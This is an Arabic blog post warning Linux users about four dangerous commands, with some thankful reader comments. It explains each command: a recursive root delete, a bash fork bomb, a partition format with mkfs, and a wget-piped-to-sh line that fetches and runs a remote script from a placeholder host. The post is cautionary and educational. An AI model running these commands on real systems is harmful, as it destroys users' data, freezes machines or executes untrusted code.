انظم الينا على :

اجدد المواضيع :

4 اوامر قد تشكل خطرا على نظام الينكس الخاص بك



السلام عليكم هذا أخوكم  MBARK TiéSTO

افضل شيئ فى نظام اللينكس انه نظام مفتوح المصدر اى انه يمكنك التعديل عليه بخلاف نظام الويندوز , لذا فان اوامره يجب التعامل معها بحرص إن كنت لاتعرف دورها حيت أنه لن يتم سؤالك ما اذا كنت تريد بالفعل تنفيذ هذه الأوامر، لذالك في هذه التدوينة سأتطرق معكم إلى شرح 4 أوامر لينكس تشكل خطر حقيقي على جهازك ونظامك وهذا بطبيعة الحال في إطار الحماية . أتمنى أن ينال الموضوع إعجابكم ولا تبخلو علينا بردودكم المميزة.

rm -rf / :

الامر rm -rf / يحذف كل شيئ موجود فى نظمك . كل شيئ فى الهارد ديسك و حتى اليو اس بي او اى اسطوانة موجودة فى جهازك . لفهم تفسير الامر يمكنك قراءة التالى :

  • rm : تعنى امسح الملفات الاتية . 
  • -rf : نفذ الامر rm بشكل متكرر دائما ( يعنى من الاخر امسح كل شيئ فى طريقك ) و امسح كل شيئ بدون تنبيه لك. 
  • / : يتم اخبار الامر rm بالبدأ بكل المسارات التى بها / . التى تحتوى على كل ملفاتك بالاضافة الى اى شيئ متصل بالكومبيوتر.
و بسرعة فائقة سيتم الاستجابة لهذا الامر بواسطة اللينكس و سيتم حذف كل شيئ لديك. المهم ان تكون حذرا من مجموعة الاوامر التى تحتوى على المقطع rm -rf


:(){ :|: & };:

 هذا السطر الصغير يؤدى وظيفة نسخ ملف او شيل Shell يقوم بنسخ نفسه بنفسه بسرعة مثل الفاروس و لكن الفايروس يكون له هذف معين ليصيبه و لكن الشيل الذى يتم نسخه سيعمل على توقف عمل ال CPU و توقف الجهاز و تشنجه.

mkfs.ext4 /dev/sda1
  • mkfs.ext4 : عمل ملف ext4 فى الجهاز . 
  • /dev/sda1: حدد اول بارتشن و ابدأ مسح ما فيه من ملفات
هذا الامر مساو تقريبا لوظيفة عمل فورمات للبارتشن C: فى نظام ويندوزيمكن كتابة هذا الامر بصورة اخرى مثل هذه mkfs.ext3 /dev/sdb2 و لاحظ هنا انى اضفت رقم 2 للمقطع sdb2 اى يتم عمل فورمات لبارتشن ثانى.

wget http://example.com/something -O – | sh

هذا الامر يعمل على تحميل سكريبت معين من النت و تشغيله على جهازك و لاحظ وجود كلمة example التى يوضع مكانها اسم الموقع المحيل الذى سيتم تحميل السكريبت من عليه . الامر يعتبر من اخطرها اذا تم تحميل سكريبت من جهة غير معروفة و تشغيله.
  • wget  :  تحميل ملف.                                                                              
  • http://example.com/something  : تحميل الملف من هذا المسار.             
  • sh : تنفيذ و تشغيل السكريبت .  



شاركه

عن Unknown

هذا النص الغبي ، غير مقصود لقرائته . وفقا لذلك فمن الصعب معرفة متى وأين نهايته ، لكن حتى . فإن هذا النص الغبي ، ليس مقصود لقرائته . نقطة رجوع لسطر مدونة مدون محترف ترحب بك.
    تعليقات بلوجر
    تعليقات فيسبوك

4 التعليقات:

  1. ألف شكر لك يا أخي

    ردحذف
  2. يعطيك العافية يا أخي مبارك

    ردحذف
  3. الله يعافيك يا أخي وشكرا على مرورك المميز

    ردحذف